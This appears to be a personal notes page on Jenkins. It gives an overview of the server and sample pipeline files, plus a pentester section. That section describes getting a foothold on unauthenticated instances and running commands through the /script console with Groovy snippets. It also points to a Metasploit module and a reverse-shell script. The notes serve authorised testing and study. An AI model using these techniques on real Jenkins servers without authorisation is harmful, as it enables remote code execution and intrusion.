Jenkins

Jenkins is an open-source automation server. It means that it's not a server hosting code, but it can be connected to a GIT server such as GitLab to process CI/CD workflows.

GitHub (21.9k ⭐)
User Documentation (⛪)

The biggest strength of Jenkins is that it has a great number of plugins, such as plugins to visualize CI results (tests, coverage...).

Jenkins is written in Java, while Groovy is often used for plugins and for configuration files. It runs on Apache Tomcat.

Ports 🐲: 8080 (HTTP) and 5000 (Master/Slave communication).

Jenkins can be connected to a database or LDAP.

Jenkins Pentester Notes ☠️

Useful reference: pwn_jenkins (1.7k ⭐).

Enumeration

Try to access the login page (/login)

Foothold

Some Jenkins instances don't have authentication
Some Jenkins instances may allow us to create accounts

Exploitation

The /script endpoint can be used to run groovy code.

def command = "ls /"
def stdout = new StringBuffer(), stderr = new StringBuffer()
def process = command.execute()
process.consumeProcessOutput(stdout, stderr)
process.waitForOrKill(1000)
def exitCode = process.exitValue()
def output = stderr + stdout

println("Exit Code: ${exitCode}")
println("Output:\n${output}")

➡️ See also: revsh.groovy (0.1k ⭐).

Additional Notes For /script

Metasploit: exploit/multi/http/jenkins_script_console.

r = Runtime.getRuntime()
p = r.exec(["/bin/ls","-la"] as String[])
p.waitFor()

def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");

👻 To-do 👻

Stuff that I found, but never read/used yet.

master/slaves (a.k.a. workers)
freestyle projects (web interface) vs pipeline jobs (as code)
Jenkinsfile (groovy)
/var/lib/jenkins3/

Basic file

pipeline {
    agent any
    stages {
        stage('xxx') {
            steps {
                git 'https://github.com/example/my-java-app.git'
                git branch: env.BRANCH_NAME, url: 'URL'
                sh 'xxx'
            }
        }
    }
}

Add options

    options {
        buildDiscarder(logRotator(numToKeepStr: '10', daysToKeepStr: '7'))
    }

Poll SCM or webhooks to trigger a pipeline

    triggers {
        cron('H H(0-7) * * 1-5')
        webhook('')
    }

Artifacts are the output of the build

    post {
        always {
            junit '*.xml'
        }
        success {
            archiveArtifacts '*.xml'
        }
    }

Bonus

stage('xxx') {
    when {
        branch 'development'
    }
}

// https://plugins.jenkins.io/warnings-ng/
recordIssues(
    tools: [clangTidy(pattern: 'clang-tidy-report.txt')]
)

Jenkins ¶

Jenkins Pentester Notes ☠️ ¶

Enumeration ¶

Foothold ¶

Exploitation ¶